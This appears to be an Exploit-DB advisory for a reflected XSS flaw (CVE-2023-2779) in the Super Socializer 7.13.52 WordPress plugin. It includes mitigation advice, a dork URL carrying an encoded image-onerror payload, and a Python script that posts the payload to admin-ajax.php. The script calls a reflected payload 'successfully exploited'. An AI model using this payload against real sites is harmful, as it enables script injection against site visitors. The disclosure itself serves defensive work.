Super Socializer 7.13.52 - Reflected XSS

vendor:

Super Socializer

by:

Amirhossein Bahramizadeh

6.1

CVSS

MEDIUM

Reflected XSS

CWE

Product Name: Super Socializer

Affected Version From: 7.13.52

Affected Version To: 7.13.52

Patch Exists: YES

Related CWE: CVE-2023-2779

CPE: a:wordpress:super_socializer:7.13.52

Metasploit:

Other Scripts:

Platforms Tested: Windows, Linux

2023

Super Socializer 7.13.52 – Reflected XSS

The Super Socializer plugin version 7.13.52 is vulnerable to a reflected XSS vulnerability. Attackers can exploit this vulnerability by injecting malicious JavaScript code into the vulnerable parameter. When a user visits a crafted URL containing the payload, the injected code will be executed in the user's browser, potentially allowing the attacker to steal sensitive information or perform unauthorized actions on behalf of the user.

Mitigation:

To mitigate this vulnerability, it is recommended to update to the latest version of the Super Socializer plugin. Additionally, input validation and sanitization should be implemented to properly handle user-supplied data.

Source

Exploit-DB raw data:

# Exploit Title: Super Socializer 7.13.52 - Reflected XSS
# Dork: inurl: https://example.com/wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[%3Cimg%20src%3Dx%20onerror%3Dalert%28document%2Edomain%29%3E]=https://www.google.com
# Date: 2023-06-20
# Exploit Author: Amirhossein Bahramizadeh
# Category : Webapps
# Vendor Homepage: https://wordpress.org/plugins/super-socializer
# Version: 7.13.52 (REQUIRED)
# Tested on: Windows/Linux
# CVE : CVE-2023-2779
import requests

# The URL of the vulnerable AJAX endpoint
url = "https://example.com/wp-admin/admin-ajax.php"

# The vulnerable parameter that is not properly sanitized and escaped
vulnerable_param = "<img src=x onerror=alert(document.domain)>"

# The payload that exploits the vulnerability
payload = {"action": "the_champ_sharing_count", "urls[" + vulnerable_param + "]": "https://www.google.com"}

# Send a POST request to the vulnerable endpoint with the payload
response = requests.post(url, data=payload)

# Check if the payload was executed by searching for the injected script tag
if "<img src=x onerror=alert(document.domain)>" in response.text:
    print("Vulnerability successfully exploited")
else:
    print("Vulnerability not exploitable")